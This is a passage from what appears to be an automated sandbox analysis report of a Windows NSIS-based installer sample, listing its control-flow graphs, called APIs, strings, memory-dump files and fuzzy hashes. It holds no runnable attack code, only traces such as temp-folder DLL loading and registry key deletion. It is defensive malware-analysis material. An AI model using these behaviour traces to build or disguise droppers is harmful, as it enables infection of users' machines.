                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
                                                                                                                                                                                                                                    • API String ID: 4024019347-3319343437
                                                                                                                                                                                                                                    • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                                                                                                                                                                                                    • Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 421 401774-401799 call 402dab call 405fc8 426 4017a3-4017b5 call 406682 call 405f51 lstrcatW 421->426 427 40179b-4017a1 call 406682 421->427 432 4017ba-4017bb call 406930 426->432 427->432 436 4017c0-4017c4 432->436 437 4017c6-4017d0 call 4069df 436->437 438 4017f7-4017fa 436->438 445 4017e2-4017f4 437->445 446 4017d2-4017e0 CompareFileTime 437->446 440 401802-40181e call 406172 438->440 441 4017fc-4017fd call 40614d 438->441 448 401820-401823 440->448 449 401892-4018bb call 405707 call 403376 440->449 441->440 445->438 446->445 450 401874-40187e call 405707 448->450 451 401825-401863 call 406682 * 2 call 4066bf call 406682 call 405ce2 448->451 463 4018c3-4018cf SetFileTime 449->463 464 4018bd-4018c1 449->464 461 401887-40188d 450->461 451->436 485 401869-40186a 451->485 465 402c38 461->465 467 4018d5-4018e0 CloseHandle 463->467 464->463 464->467 468 402c3a-402c3e 465->468 470 4018e6-4018e9 467->470 471 402c2f-402c32 467->471 473 4018eb-4018fc call 4066bf lstrcatW 470->473 474 4018fe-401901 call 4066bf 470->474 471->465 478 401906-40239d 473->478 474->478 483 4023a2-4023a7 478->483 484 40239d call 405ce2 478->484 483->468 484->483 485->461 486 40186c-40186d 485->486 486->450
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt,?,?,00000031), ref: 004017B5
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt,?,?,00000031), ref: 004017DA
                                                                                                                                                                                                                                      • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,?,0000000A,?), ref: 0040668F
                                                                                                                                                                                                                                      • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                                                                                                                                                                                      • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                                                                                                                                                                                      • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsb3903.tmp$C:\Users\user\AppData\Local\Temp\nsb3903.tmp\System.dll$C:\Users\user\eftermodnendes\ringeagt$Call
                                                                                                                                                                                                                                    • API String ID: 1941528284-1989366663
                                                                                                                                                                                                                                    • Opcode ID: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
                                                                                                                                                                                                                                    • Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 487 4026f1-40270a call 402d89 490 402710-402717 487->490 491 402c2f-402c32 487->491 492 402719 490->492 493 40271c-40271f 490->493 494 402c38-402c3e 491->494 492->493 496 402883-40288b 493->496 497 402725-402734 call 4065e2 493->497 496->491 497->496 500 40273a 497->500 501 402740-402744 500->501 502 4027d9-4027dc 501->502 503 40274a-402765 ReadFile 501->503 504 4027f4-402804 call 4061f5 502->504 505 4027de-4027e1 502->505 503->496 506 40276b-402770 503->506 504->496 514 402806 504->514 505->504 508 4027e3-4027ee call 406253 505->508 506->496 507 402776-402784 506->507 510 40278a-40279c MultiByteToWideChar 507->510 511 40283f-40284b call 4065c9 507->511 508->496 508->504 510->514 515 40279e-4027a1 510->515 511->494 520 402809-40280c 514->520 518 4027a3-4027ae 515->518 518->520 522 4027b0-4027d5 SetFilePointer MultiByteToWideChar 518->522 520->511 521 40280e-402813 520->521 523 402850-402854 521->523 524 402815-40281a 521->524 522->518 525 4027d7 522->525 527 402871-40287d SetFilePointer 523->527 528 402856-40285a 523->528 524->523 526 40281c-40282f 524->526 525->514 526->496 529 402831-402837 526->529 527->496 530 402862-40286f 528->530 531 40285c-402860 528->531 529->501 532 40283d 529->532 530->496 531->527 531->530 532->496
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 00402798
                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 004027BB
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004027D1
                                                                                                                                                                                                                                      • Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406269
                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                                    • String ID: 9
                                                                                                                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                                                                                                                    • Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                                                                                                                                                                                                    • Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 533 406a06-406a26 GetSystemDirectoryW 534 406a28 533->534 535 406a2a-406a2c 533->535 534->535 536 406a3d-406a3f 535->536 537 406a2e-406a37 535->537 539 406a40-406a73 wsprintfW LoadLibraryExW 536->539 537->536 538 406a39-406a3b 537->538 538->539
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406A58
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 00406A6C
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                    • String ID: %s%S.dll$UXTHEME
                                                                                                                                                                                                                                    • API String ID: 2200240437-1106614640
                                                                                                                                                                                                                                    • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                                                                                                                    • Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 540 402eae-402ed7 call 4064ef 542 402edc-402ee0 540->542 543 402f91-402f95 542->543 544 402ee6-402eea 542->544 545 402eec-402f0d RegEnumValueW 544->545 546 402f0f-402f22 544->546 545->546 547 402f76-402f84 RegCloseKey 545->547 548 402f4b-402f52 RegEnumKeyW 546->548 547->543 549 402f24-402f26 548->549 550 402f54-402f66 RegCloseKey call 406a76 548->550 549->547 551 402f28-402f3c call 402eae 549->551 555 402f86-402f8c 550->555 556 402f68-402f74 RegDeleteKeyW 550->556 551->550 558 402f3e-402f4a 551->558 555->543 556->543 558->548
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1354259210-0
                                                                                                                                                                                                                                    • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                                                                                                                                                                                    • Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 559 70251817-70251856 call 70251bff 563 70251976-70251978 559->563 564 7025185c-70251860 559->564 565 70251862-70251868 call 7025243e 564->565 566 70251869-70251876 call 70252480 564->566 565->566 571 702518a6-702518ad 566->571 572 70251878-7025187d 566->572 573 702518cd-702518d1 571->573 574 702518af-702518cb call 70252655 call 70251654 call 70251312 GlobalFree 571->574 575 7025187f-70251880 572->575 576 70251898-7025189b 572->576 580 702518d3-7025191c call 70251666 call 70252655 573->580 581 7025191e-70251924 call 70252655 573->581 597 70251925-70251929 574->597 578 70251882-70251883 575->578 579 70251888-70251889 call 70252b98 575->579 576->571 582 7025189d-7025189e call 70252e23 576->582 585 70251885-70251886 578->585 586 70251890-70251896 call 70252810 578->586 593 7025188e 579->593 580->597 581->597 590 702518a3 582->590 585->571 585->579 596 702518a5 586->596 590->596 593->590 596->571 601 70251966-7025196d 597->601 602 7025192b-70251939 call 70252618 597->602 601->563 607 7025196f-70251970 GlobalFree 601->607 609 70251951-70251958 602->609 610 7025193b-7025193e 602->610 607->563 609->601 612 7025195a-70251965 call 702515dd 609->612 610->609 611 70251940-70251948 610->611 611->609 613 7025194a-7025194b FreeLibrary 611->613 612->601 613->609
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 70251BFF: GlobalFree.KERNEL32(?), ref: 70251E74
                                                                                                                                                                                                                                      • Part of subcall function 70251BFF: GlobalFree.KERNEL32(?), ref: 70251E79
                                                                                                                                                                                                                                      • Part of subcall function 70251BFF: GlobalFree.KERNEL32(?), ref: 70251E7E
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 702518C5
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 7025194B
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70251970
                                                                                                                                                                                                                                      • Part of subcall function 7025243E: GlobalAlloc.KERNEL32(?,?), ref: 7025246F
                                                                                                                                                                                                                                      • Part of subcall function 70252810: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,70251896,00000000), ref: 702528E0
                                                                                                                                                                                                                                      • Part of subcall function 70251666: wsprintfW.USER32 ref: 70251694
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29621683909.0000000070251000.00000020.00000001.01000000.00000005.sdmp, Offset: 70250000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621638856.0000000070250000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621730229.0000000070254000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29621783107.0000000070256000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_70250000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3962662361-3916222277
                                                                                                                                                                                                                                    • Opcode ID: e5f756c077c7ccf48bb99d4a86cfd943d325b65827350d3dc60552499650e43d
                                                                                                                                                                                                                                    • Instruction ID: eacfb03995b35ac6bb1af90c25550a3f2f0e2d33397a20d2ced14224e210aa54
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5f756c077c7ccf48bb99d4a86cfd943d325b65827350d3dc60552499650e43d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7441B6736002429FDB119F20DC9DB9D37ACAF05314F1444E9FA069A2C5DB74E8ACDB68

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 616 401c48-401c68 call 402d89 * 2 621 401c74-401c78 616->621 622 401c6a-401c71 call 402dab 616->622 624 401c84-401c8a 621->624 625 401c7a-401c81 call 402dab 621->625 622->621 628 401cd8-401d02 call 402dab * 2 FindWindowExW 624->628 629 401c8c-401ca8 call 402d89 * 2 624->629 625->624 639 401d08 628->639 640 401cc8-401cd6 SendMessageW 629->640 641 401caa-401cc6 SendMessageTimeoutW 629->641 642 401d0b-401d0e 639->642 640->639 641->642 643 401d14 642->643 644 402c2f-402c3e 642->644 643->644
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                    • Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                                                                                                                                                                                                    • Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 647 40248f-4024b6 call 402dab * 2 call 402e3b 653 4024bb-4024c0 647->653 654 4024c6-4024d0 653->654 655 402c2f-402c3e 653->655 656 4024d2-4024df call 402dab lstrlenW 654->656 657 4024e3-4024e6 654->657 656->657 661 4024e8-4024f9 call 402d89 657->661 662 4024fa-4024fd 657->662 661->662 665 40250e-402522 RegSetValueExW 662->665 666 4024ff-402509 call 403376 662->666 669 402524 665->669 670 402527-402608 RegCloseKey 665->670 666->665 669->670 670->655
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb3903.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseValuelstrlen
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsb3903.tmp
                                                                                                                                                                                                                                    • API String ID: 2655323295-3692555289
                                                                                                                                                                                                                                    • Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                                                                                                                                                                                                    • Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 672 4061a1-4061ad 673 4061ae-4061e2 GetTickCount GetTempFileNameW 672->673 674 4061f1-4061f3 673->674 675 4061e4-4061e6 673->675 677 4061eb-4061ee 674->677 675->673 676 4061e8 675->676 676->677
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004061BF
